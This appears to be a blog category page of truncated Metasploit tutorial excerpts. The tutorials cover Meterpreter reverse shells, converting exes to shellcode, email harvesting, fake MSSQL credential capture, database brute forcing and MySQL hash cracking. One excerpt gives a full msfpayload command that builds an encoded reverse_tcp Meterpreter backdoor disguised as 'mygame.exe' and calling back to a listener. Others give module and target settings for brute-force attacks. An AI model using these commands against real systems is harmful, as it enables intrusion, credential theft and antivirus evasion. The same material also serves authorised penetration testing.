Category: Metasploit

All about Metasploit!

Hacking, Metasploit, RedTeaming

Simple Background HTTPS Reverse Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more. Msfvenom is the combination of payload generation and encoding. msfvenom usage Usage: …

Metasploit

How to generate shellcode from custom exe in metasploit

To use a custom exe as a payload or to use your custom exe in a document or excel file, you have to “convert” your exe to shellcode. To accomplish this: 1> Run Kali Linux 2> Open a terminal window 3> Type msfconsolemsfconsole and hit enter 4> Type use payload/generic/customuse payload/generic/custom and hit enter 5> …

Information Gathering, Metasploit, Reconnaissance

Email harvesting with Metasploit

Email harvesting is the process of obtaining lists of email addresses using various methods. You can check on your own what emails, attackers are going to find about your domain using Metasploit’s module, Search Engine Domain Email Address Collector. This module uses Google, Bing and Yahoo to create a list of valid email addresses for …

Backdoors, Metasploit

Create crypted Backdoor with Metasploit and Backtrack

We will use windows/meterpreter/reverse_tcp payload. We will encode payload 10 times with shikata_ga_nai and 10 times with call4_dword_xor.   1. Open console window   2. Type: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t exe -c 10 -o mygame.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 R | msfencode …

Metasploit, Phishing

MSSQL Phishing with metasploit

Metasploit has a mssql capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weak encoded database logins as well as Windows logins (NTLM).   To select the capture module type: use auxiliary/server/capture/mssqluse auxiliary/server/capture/mssql   Options You can set CAINPWFILE …

Metasploit, MSSQL

Brute forcing Microsoft SQL Server

Metasploit offers auxiliary module mssql_login. This module will query the MSSQL instance for a specific username and password pair.   The default administrator’s username for SQL server is sa. In the options of this module, you can specify a specific password, or a password list, a username list or a username-password list where usernames and …

Metasploit, MSSQL

Detecting a Microsoft SQL Server

Microsoft SQL Server (MSSQL) is a relational database management system (RDMS) used to store, retrieve and manage information. As with many Microsoft’s products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.   Discover open MSSQL ports MSSQL is running by default on port 1433. To discover SQL …

Cracking, John the Ripper, Metasploit, MySQL

Cracking MySQL passwords with John The Ripper

Dump MySQL Password Hashes mysql_hashdump extracts the usernames and encrypted password hashes from a MySQL server. You can then use jtr_mysql_fast module to crack them. The module is located in auxiliary/scanner/mysql. To use it set RHOSTS option to your target’s ip address and increase THREADS value. If you have managed to reveal root password then …

Brute-force, Databases, Metasploit, MySQL

Brute forcing MySQL

There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL server for specific usernames and passwords.   To start your attack you have to set the RHOSTS option and choose a username and a password if you would like a single login query. SET RHOSTS 192.168.2.13SET RHOSTS 192.168.2.13 Let’s try …